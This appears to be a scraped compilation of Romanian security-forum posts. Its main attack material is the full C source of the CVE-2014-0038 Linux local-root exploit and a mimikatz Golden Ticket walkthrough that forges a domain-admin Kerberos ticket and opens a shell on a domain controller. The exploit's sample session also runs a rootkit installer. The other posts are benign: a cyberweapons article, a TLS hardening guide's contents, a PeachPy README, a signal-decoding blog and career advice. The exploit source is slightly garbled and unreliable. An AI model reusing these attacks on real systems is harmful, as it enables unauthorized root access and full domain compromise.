installed on user’s android device. The Google Security Team also liked that technique and they described it on OWASP AppSec Eu as Reverse Clickjacking. ?????: Paul Axe ?? 6:03 Sursa: @Paul_Axe : Two stories about XSS on Google

recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y) Detalii: http://seclists.org/oss-sec/2014/q1/187 /* *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y) CVE-2014-0038 / x32 ABI with recvmmsg by rebel @ irc.smashthestack.org ----------------------------------- takes about 13 minutes to run because timeout->tv_sec is decremented once per second and 0xff*3 is 765. some things you could do while waiting: * watch 3 times * read https://wiki.ubuntu.com/Security/Features and smirk a few times * brew some coffee * stare at the countdown giggly with anticipation could probably whack the high bits of some pointer with nanoseconds, but that would require a bunch of nulls before the pointer and then reading an oops from dmesg which isn't that elegant. &net_sysctl_root.permissions is nice because it has 16 trailing nullbytes hardcoded offsets because I only saw this on ubuntu & kallsyms is protected anyway.. same principle will work on 32bit but I didn't really find any major distros shipping with CONFIG_X86_X32=y user@ubuntu:~$ uname -a Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg user@ubuntu:~$ ./recvmmsg byte 3 / 3.. ~0 secs left. w00p w00p! # id uid=0(root) gid=0(root) groups=0(root) # sh phalanx-2.6b-x86_64.sh unpacking.. = greets to my homeboys kaliman, beist, capsl & all of #social Sat Feb 1 22:15:19 CET 2014 % rebel % *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* */ #define _GNU_SOURCE #include <netinet/ip.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <unistd.h> #include <sys/syscall.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/utsname.h> #define __X32_SYSCALL_BIT 0x40000000 #undef __NR_recvmmsg #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537) #define VLEN 1 #define BUFSIZE 200 int port; struct offset { char *kernel_version; unsigned long dest; // net_sysctl_root + 96 unsigned long original_value; // net_ctl_permissions unsigned long prepare_kernel_cred; unsigned long commit_creds; }; struct offset offsets[] = { {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10 {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10 {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04 {NULL,0,0,0,0} }; void udp(int { int sockfd; struct sockaddr_in servaddr,cliaddr; int s = 0xff+1; if(fork() == 0) { while(s > 0) { fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s)); sleep(1); s--; fprintf(stderr,"."); } sockfd = socket(AF_INET,SOCK_DGRAM,0); bzero(&servaddr,sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK); servaddr.sin_port=htons(port); sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr)); exit(0); } } void trigger() { open("/proc/sys/net/core/somaxconn",O_RDONLY); if(getuid() != 0) { fprintf(stderr,"not root, ya blew it!\n"); exit(-1); } fprintf(stderr,"w00p w00p!\n"); system("/bin/sh -i"); } typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; // thx bliss static int __attribute__((regparm(3))) getroot(void *head, void * table) { commit_creds(prepare_kernel_cred(0)); return -1; } void __attribute__((regparm(3))) trampoline() { asm("mov $getroot, %rax; call *%rax;"); } int main(void) { int sockfd, retval, i; struct sockaddr_in sa; struct mmsghdr msgs[VLEN]; struct iovec iovecs[VLEN]; char buf[bUFSIZE]; long mmapped; struct utsname u; struct offset *off = NULL; uname(&u); for(i=0;offsets.kernel_version != NULL;i++) { if(!strcmp(offsets.kernel_version,u.release)) { off = &offsets; break; } } if(!off) { fprintf(stderr,"no offsets for this kernel version..\n"); exit(-1); } mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1)); mmapped &= 0x000000ffffffffff; srand(time(NULL)); port = (rand() % 30000)+1500; commit_creds = (_commit_creds)off->commit_creds; prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred; mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(mmapped == -1) { perror("mmap()"); exit(-1); } memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3); memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300); if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) { perror("mprotect()"); exit(-1); } sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd == -1) { perror("socket()"); exit(-1); } sa.sin_family = AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port = htons(port); if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { perror("bind()"); exit(-1); } memset(msgs, 0, sizeof(msgs)); iovecs[0].iov_base = &buf; iovecs[0].iov_len = BUFSIZE; msgs[0].msg_hdr.msg_iov = &iovecs[0]; msgs[0].msg_hdr.msg_iovlen = 1; for(i=0;i < 3 ;i++) { udp(i); retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i); if(!retval) { fprintf(stderr,"\nrecvmmsg() failed\n"); } } close(sockfd); fprintf(stderr,"\n"); trigger(); } Sursa: [C] recvmmsg.c - Pastebin.com

If This Is Cyberwar, Where Are All the Cyberweapons? The discovery of Stuxnet in 2010 seemed to herald a new age of cyberwar, but that age has yet to materialize. By Paul F. Roberts on January 27, 2014 Like the atomic bomb in the waning days of World War II, the computer virus known as Stuxnet, discovered in 2010, seemed to usher in a new era of warfare. In the era of cyberwar, experts warned, silent, software-based attacks will take the place of explosive ordinance, tanks, and machine guns, or at least set the stage for them. Or maybe not. Almost four years after it was first publicly identified, Stuxnet is an anomaly: the first and only cyberweapon ever known to have been deployed. Now some experts in cybersecurity and critical infrastructure want to know why. Are there fewer realistic targets than suspected? Are such weapons more difficult to construct than realized? Or is the current generation of cyberweapons simply too well hid? Such questions were on the minds of the world’s top experts in the security of industrial control systems last week at the annual S4 conference outside Miami. S4 gathers the world’s top experts on the security of nuclear reactors, power grids, and assembly lines. At S4 there was broad agreement that—long after Stuxnet’s name has faded from the headlines—industrial control systems like the Siemens Programmable Logic Controllers are still vulnerable. Eireann Leverett, a security researcher at the firm IOActive, told attendees at the conference that commonplace security practices in the world of enterprise information technology are still uncommon among vendors who develop industrial control systems (see “Protecting Power Grids from Hackers Is a Huge Challenge”). Leverett noted that modern industrial control systems, which sell for thousands of dollars per unit, often ship with software that lacks basic security controls like user authentication, code signing to prevent unauthorized software updates, or event logging to allow customers to track changes to the device. It is also clear that, in the years since Stuxnet came to light, developed and developing nations alike have seized on cyber operations as a fruitful new avenue for research and development (see “Welcome to the Malware Industrial Complex”). Laura Galante, a former U.S. Department of Defense intelligence analyst who now works for the firm Mandiant, said that the U.S. isn’t just tracking the activities of nations like Russia and China, but also Syria and Stuxnet’s target of choice: Iran. Galante said cyberweapons give smaller, poorer nations a way to leverage asymmetric force against much larger foes. Even so, truly effective cyberweapons require extraordinary expertise. Ralph Langner, perhaps the world’s top authority on the Stuxnet worm, argues that the mere hacking of critical systems doesn’t count as cyberwarfare. For example, Stuxnet made headlines for using four exploits for “zero day” (or previously undiscovered) holes in the Windows operating system. But Langner said the metallurgic expertise needed to understand the construction of Iran’s centrifuges was far more impressive. Those who created Stuxnet needed to know the exact amount of pressure or torque needed to damage aluminum rotors within them, sabotaging the country’s uranium enrichment operation. Concentrating on software-based tools that can cause physical harm sets a much higher bar for discussions of cyberweapons, Langner argues. By that standard, Stuxnet was a true cyberweapon, but the 2012 Shamoon attack against the oil giant Saudi Aramco and other oil companies was not, even though it erased the hard drives of the computers it infected. Some argue that the conditions for using such a destructive cyberweapon simply haven’t arisen again—and aren’t likely to for a while. Operations like Stuxnet—stealth projects designed to slowly degrade Iran’s enrichment capability over years—are the exception rather than the rule, said Thomas Rid of the Department of War Studies at Kings College in London. “There are not too many targets that would lend themselves to a covert campaign as Stuxnet did,” Rid said. Rid told attendees that the quality of the intelligence gathered on a particular target makes the difference between an effective cyberweapon and a flop. It’s also possible that other cyberweapons have been used, but the circumstances surrounding their use are a secret, locked up by governments as “classified” information, or protected by strict nondisclosure agreements. Indeed, Langner, who works with some of the world’s leading industrial firms and governments, said he knows of one other true physical cyberattack, this one tied to a criminal group. But he wouldn’t talk about it. Industrial control professionals and academics complain that the information needed to research future attacks are being kept out of the public domain. And public utilities, industrial firms, and owners of critical infrastructure are just now becoming aware that systems they assumed were cordoned off from the public Internet very often are not. Meanwhile, technology is driving even more rapid and transformative changes as part of what’s called the Internet of things. Ubiquitous Internet connectivity combined with inexpensive and tiny computers and sensors will soon allow autonomous systems to communicate directly with each other (see “Securing the Smart Home, from Toasters to Toilets”). Without proper security features built into industrial products from the get-go, the potential for attacks and physical harm increase dramatically. “If we continue to ignore the problem, we are going to be in deep trouble,” Langner said. Sursa: Where Are All the Cyberweapons? | MIT Technology Review

[h=1]mimikatz - Golden Ticket[/h] [h=2]Introduction[/h] We have a new feature again in mimikatz called Golden Ticket provided by Benjamin Delpy aka gentilkiwi. With this technique, we can basically access any resource in the domain. Here is the list of what you need to make it work: krbtgt user's NTLM hash (e.g. from a previous NTDS.DIT dump) Username that we'd like to impersonate As you can see, exploiting this architectural flaw is not trivial, because we need the NTLM hash of the krbtgt user and that requires hacking a Domain Controller first. But once that is done we can play with it for some time, because the hash of the krbtgt user will not change for a while. As you know mimikatz can dump and replay the existing tickets on Windows, so when we got access to a server or workstation and dumped the tickets we can easily replay those on another computer and get access to the same resource. See Google for more info. Domain name Domain's SID [h=2]Attack[/h] When we have everything from the list above, we can create a new TGT ticket with mimikatz and grant access to anything in the domain. Let's see an example: First we look for a domain administrator: Domain name Domain's SID C:\Users\evilhacker>net group "domain admins" /domain The request will be processed at a domain controller for domain ctu.domain. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator schema.Admin Jack.Bauer Administrator is good for us, so we create a TGT ticket with the Kerberos user's hashed password and make it look like as if Administrator asked for an access to a share. Now let's get the Domain SID. Easiest way to do that is just use: "whoami /user" and remove the last part of the SID, or if we have PsTools then PsGetsid.exe come in handy: C:\Users\evilhacker\Documents\mimikatz>PsGetsid.exe CTU.DOMAIN PsGetSid v1.44 - Translates SIDs to names and vice versa Copyright (C) 1999-2008 Mark Russinovich Sysinternals - www.sysinternals.com SID for CTU.DOMAIN\CTU.DOMAIN: S-1-1-12-123456789-1234567890-123456789 Now we have everything to start the attack. First we list the existing Kerberos tickets, if there is any we can those with the purge command (but it is not necessary) and then we can create the Golden Ticket and pass that. C:\Users\evilhacker\Documents\mimikatz>mimikatz.exe .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 21 2014 15:06:17) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 14 modules * * */ mimikatz # kerberos::list [00000000] - 17 Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014 11:23:28 AM Server Name : krbtgt/CTU.DOMAIN @ CTU.DOMAIN Client Name : evilhacker @ CTU.DOMAIN Flags 60a00000 : pre_authent ; renewable ; forwarded ; forwardable ; ... mimikatz # kerberos::purge Ticket(s) purge for current session is OK mimikatz # kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi Admin : Administrator Domain : CTU.DOMAIN SID : S-1-1-12-123456789-1234567890-123456789 krbtgt : deadbeefboobbabe003133700009999 Ticket : Administrator.kiribi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! mimikatz # kerberos::ptt Administrator.kiribi Ticket 'Administrator.kiribi' successfully submitted for current session mimikatz # kerberos::list [00000000] - 17 Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM Server Name : krbtgt/CTU.DOMAIN @ CTU.DOMAIN Client Name : Administrator @ CTU.DOMAIN Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ; mimikatz # kerberos::tgt Keberos TGT of current session : Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1 /24/2034 12:52:13 PM Service Name (02) : krbtgt ; CTU.DOMAIN; @ CTU.DOMAIN Target Name (--) : @ CTU.DOMAIN Client Name (01) : Administrator ; @ CTU.DOMAIN Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ; Session Key (17) : 5b 1a f2 fb f2 4d 2c 70 9c 3f 36 80 82 0c 23 37 Ticket (00 - 17) : [...] (NULL session key means allowtgtsessionkey is not set to 1) Now you can mount any share or use any RPC related tool that you like. C:\Users\evilhacker\Documents\mimikatz>net use i: \\dc01.ctu.domain\c$ The command completed successfully. C:\Users\evilhacker\Documents\mimikatz>net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK I: \\dc01.ctu.domain\c$ Microsoft Windows Network The command completed successfully. OR C:\Users\evilhacker\Documents\pstools>PsExec.exe \\dc01.ctu.domain\ cmd.exe PsExec v2.0 - Execute processes remotely Copyright (C) 2001-2013 Mark Russinovich Sysinternals - www.sysinternals.com Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>hostname DC01 C:\Windows\system32>exit cmd.exe exited on dc01.ctu.domain\ with error code 0. Some additional notes: Mimikatz does not require SE_DEBUG or other privilege to create and pass TGT [h=2]Mitigation[/h] I am not aware of any good mitigation for this. Please let me know if you do. [h=2]Greetings[/h] Thanks to Kristof Feiszt for support, Benjamin `gentilkiwi` Delpy for mimikatz [h=2]Author[/h] Balazs Bucsay - mimikatz[!at!]rycon[!dot!]hu - rycon.hu - 2014. 01. 24. Sursa: rycon.hu - mimikatz's Golden Ticket

Applied Crypto Hardening Wolfgang Breyha, David Durvaux, Tobias Dussa, L. Aaron Kaplan, Florian Mendel, Christian Mock, Manuel Koschuch, Adi Kriegisch, Ulrich Pöschl, Ramin Sabet, Berg San, Ralf Schlatterbeck, Thomas Schreck, Aaron Zauner, Pepi Zawodsky (University of Vienna, CERT.be, KIT-CERT, CERT.at, A-SIT/IAIK, coretec.at, FH Campus Wien, VRVis, MilCERT Austria, A-Trust, Runtux.com, Friedrich-Alexander University Erlangen-Nuremberg, azet.org, maclemon.at) Contents 1. Introduction 7 1.1. Audience . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 1.2. Related publications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 1.3. How to read this guide . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 1.4. Disclaimer and scope . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 1.5. Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 2. Practical recommendations 11 2.1. Webservers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 2.1.1. Apache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 2.1.2. lighttpd . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 2.1.3. nginx . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 2.1.4. MS IIS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 2.2. SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 2.2.1. OpenSSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 2.2.2. Cisco ASA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 2.2.3. Cisco IOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 2.3. Mail Servers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 2.3.1. SMTP in general . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 2.3.2. Dovecot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 2.3.3. cyrus-imapd . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 2.3.4. Postfix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 2.3.5. Exim (based on 4.82) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26 2.4. VPNs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30 2.4.1. IPsec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30 2.4.2. Check Point FireWall-1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32 2.4.3. OpenVPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34 2.4.4. PPTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 2.4.5. Cisco ASA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 2.4.6. Openswan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40 2.5. PGP/GPG - Pretty Good Privacy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42 2.6. IPMI, ILO and other lights out management solutions . . . . . . . . . . . . . . . . . . . 43 2.7. Instant Messaging Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43 2.7.1. General server configuration recommendations . . . . . . . . . . . . . . . . . . 43 2.7.2. ejabberd . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43 2.7.3. Chat privacy - Off-the-Record Messaging (OTR) . . . . . . . . . . . . . . . . . . 45 2.7.4. Charybdis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45 2.7.5. SILC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 2.8. Database Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 2.8.1. Oracle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 2.8.2. MySQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 2.8.3. DB2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47 2.8.4. PostgreSQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 5 Draft revision: d6ea268 (2014-01-29 21:09:52 +0100) Pepi Zawodsky Draft revision: d6ea268 (2014-01-29 21:09:52 +0100) Pepi Zawodsky 2.9. Intercepting proxy solutions and reverse proxies . . . . . . . . . . . . . . . . . . . . . 49 2.9.1. squid . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50 2.9.2. Pound . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52 3. Theory 54 3.1. Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54 3.2. Cipher suites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54 3.2.1. Architectural overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55 3.2.2. Forward Secrecy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56 3.2.3. Recommended cipher suites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56 3.2.4. Compatibility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59 3.2.5. Choosing your own cipher suites . . . . . . . . . . . . . . . . . . . . . . . . . . . 59 3.3. Random Number Generators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61 3.3.1. When random number generators fail . . . . . . . . . . . . . . . . . . . . . . . 62 3.3.2. Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62 3.3.3. Recommendations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 3.4. Keylengths . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 3.5. A note on Elliptic Curve Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 3.6. A note on SHA-1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 3.7. A note on Diffie Hellman Key Exchanges . . . . . . . . . . . . . . . . . . . . . . . . . . 66 3.8. Public Key Infrastructures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66 3.8.1. Certificate Authorities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67 3.8.2. Hardening PKI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69 A. Tools 70 A.1. SSL & TLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 A.2. Key length . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 A.3. RNGs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 A.4. Guides . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 B. Links 72 C. Suggested Reading 73 D. Cipher Suite Name Cross-Reference 74 E. Further research 83 Download: https://bettercrypto.org/static/applied-crypto-hardening.pdf

[h=1]Portable Efficient Assembly Code-generator in Higher-level Python (PeachPy)[/h] PeachPy is a Python framework for writing high-performance assembly kernels. PeachPy is developed to simplify writing optimized assembly kernels while preserving all optimization opportunities of traditional assembly. Some PeachPy features: Automatic register allocation Stack frame management, including re-aligning of stack frame as needed Generating versions of a function for different calling conventions from the same source (e.g. functions for Microsoft x64 ABI and System V x86-64 ABI can be generated from the same source) Allows to define constants in the place where they are used (just like in high-level languages) Tracking of instruction extensions used in the function. Multiplexing of multiple instruction streams (helpful for software pipelining) [h=2]Installation[/h] PeachPy can be installed from PyPI pip install PeachPy from peachpy.x64 import *# Use 'x64-ms' for Microsoft x64 ABI abi = peachpy.c.ABI('x64-sysv') assembler = Assembler(abi) # Implement function void add_1(const uint32_t *src, uint32_t *dst, size_t length) src_argument = peachpy.c.Parameter("src", peachpy.c.Type("const uint32_t*")) dst_argument = peachpy.c.Parameter("dst", peachpy.c.Type("uint32_t*")) len_argument = peachpy.c.Parameter("length", peachpy.c.Type("size_t")) # This optimized kernel will target Intel Nehalem processors. Any instructions which are not # supported on Intel Nehalem (e.g. AVX instructions) will generate an error. If you don't have # a particular target in mind, use "Unknown" with Function(assembler, "add_1", (src_argument, dst_argument, len_argument), "Nehalem"): # Load arguments into registers srcPointer = GeneralPurposeRegister64() LOAD.PARAMETER( srcPointer, src_argument ) dstPointer = GeneralPurposeRegister64() LOAD.PARAMETER( dstPointer, dst_argument ) length = GeneralPurposeRegister64() LOAD.PARAMETER( length, len_argument ) # Main processing loop. Length must be a multiple of 4. LABEL( 'loop' ) x = SSERegister() MOVDQU( x, [srcPointer] ) ADD( srcPointer, 16 ) # Add 1 to x PADDD( x, Constant.uint32x4(1) ) MOVDQU( [dstPointer], x ) ADD( dstPointer, 16 ) SUB( length, 4 ) JNZ( 'loop' ) RETURN() print assembler Sursa: https://bitbucket.org/MDukhan/peachpy

[h=3]Mystery signal from a helicopter[/h] Last night, YouTube suggested for me. It was a raw clip from a news helicopter filming a police chase in Kansas City, Missouri. I quickly noticed a weird interference in the audio, especially the left channel, and thought it must be caused by the chopper's engine. I turned up the volume and realized it's not interference at all, but a mysterious digital signal! And off we went again. The signal sits alone on the left audio channel, so I can completely isolate it. Judging from the spectrogram, the modulation scheme seems to be BFSK, switching the carrier between 1200 and 2200 Hz. I demodulated it by filtering it with a lowpass and highpass sinc in SoX and comparing outputs. Now I had a bitstream at 1200 bps. The bitstream consists of packets of 47 bytes each, synchronized by start and stop bits and separated by repetitions of the byte 0x80. Most bits stay constant during the video, but three distinct groups of bytes contain varying data, marked blue below: What could it be? Location telemetry from the helicopter? Information about the camera direction? Video timestamps? The first guess seems to be correct. It is supported by the relationship of two of the three byte groups. If the 4 first bits of each byte are ignored, the data forms a smooth gradient of three-digit numbers in base-10. When plotted parametrically, they form an intriguing winding curve. It is very similar to this plot of the car's position (blue, yellow) along with viewing angles from the helicopter (green), derived from the video by magical image analysis (only the first few minutes shown): When the received curve is overlaid with the car's location trace, we see that 100 steps on the curve scale corresponds to exactly 1 minute of arc on the map! Using this relative information, and the fact that the helicopter circled around the police station in the end, we can plot all the received data points in Google Earth to see the location trace of the helicopter: Update: Apparently the video downlink to ground was transmitted using a transmitter similar to Nucomm Skymaster TX that is able to send live GPS coordinates. And this is how they seem to do it. Posted by Oona Räisänen Sursa: absorptions: Mystery signal from a helicopter

https://www.youtube.com/watch?v=ZWM74Pf_Kd0 Old school Dedicatie pentru texan. :->

Exista astfel de persoane, persoane care abia termina facultatea (indiferent de notele obtinute) si se asteapta la salarii de mii de euro. In plus, daca te uiti pe CV-ul lor, nu o sa vezi niciun proiect si nicio actiune in care sa se fi implicat, astfel experienta 0. Sper ca voi sa fiti realisti, sa nu va luati muie urat de tot. Viata e grea. Chiar daca vedeti peste tot astfel de stiri, nu va asteptati sa sara lumea cu banii pe voi. Uitati-va singuri peste CV-ul vostru si ganditi din punctul de vedere al angajatorului. Intrebati-va cat ar merita cineva cu un CV ca al vostru. Eu am inceput cu 1600 RON si a fost ok, pentru ca am avut si oferte mai mici. Dar apoi a crescut, incet incet. Daca aveti rabdare si invatati, o sa fie mult mai usor in viitor. Si cand m-am angajat prima oara am aplicat pe la vreo 80 de firme, m-au sunat vreo 15 si eu chiar aveam destule proiecte in CV. De asemenea, daca sunteti angajati la o firma, nu sunteti platit bine, nu a fost nicio marire de salariu de mult timp si nici nu invatati mare lucru, sugestia mea e sa va cautati in alta parte de lucru. Nu e usor nici sa va gasiti de lucru. Poate va ganditi voi "Ba, eu sunt destept, ceilalti sunt prosti" dar veti vedea ca nu e chiar asa. Oricum, puteti fi Einstein al programarii, daca vine unu si cere mai putin decat voi, s-ar putea ca ala sa fie angajat. Stiu ca veneau persoane la interviuri care nu stiau ce e ala TCP si ce e ala UDP, care nu stiau sa dea un `cat` pe Linux si care nu puteau afisa numerele de pe diagonala principala a unei matrici patratice. Dar aveau pretentii salariale. Nu e bine nici sa fiti fraieri. Daca va descurcati la un interviu, cereti mai mult decat meritati. Daca nu se poate, exista posibilitatea sa va spuna "Nu va putem oferi atat, putem sa va oferim atat" sau sa va dea un sut in cur. Depind mai multe lucruri: despre ce firma e vorba, cum te-ai descurcat la interviu si cum s-au descurcat altii si foarte important, perioada in care vreti sa va angajati. Daca vreti sa va angajati in vara, ca sa vezi, si alti cateva mii de studenti vor sa faca acelasi lucru. Am mai fost la un interviu pe C++ la o firma si am stiut sa raspund perfect cam la toate intrebarile, care oricum erau banale, cu functii virtuale si alte lucruri simple si sincer, mi s-a parut ca stiu mai mult decat cei care imi luau interviul. Si nu m-au mai sunat. Apoi, am fost la un interviu pe C++ si algoritmica si m-am cam incurcat la partea de algoritmica (mai am de lucru la acest aspect) si ca sa vezi, m-au sunat si mi-au facut o oferta mai mare decat le cerusem eu. Un alt lucru ar fi urmatorul: daca de la inceput primiti un salariu mare, adica peste 30-35-40 de milioane, luati in calcul urmatoarea posibilitate: bre, astia nu cred ca o sa imi dea o marire prea curand. Apoi, mai trebuie luat in considerare si contractul, pentru ca s-ar putea sa nu puteti pleca vreo 2 ani de zile de la firma daca va plateste bine la inceput. Sugestie: cititi codul muncii, o sa va ajute. Cacat, am cam amestecat ideile, dar intelegeti voi ce am vrut sa spun.

Via?a la birou: 15 experien?e inevitabile prin care to?i trecem la locul de munc? | adevarul.ro

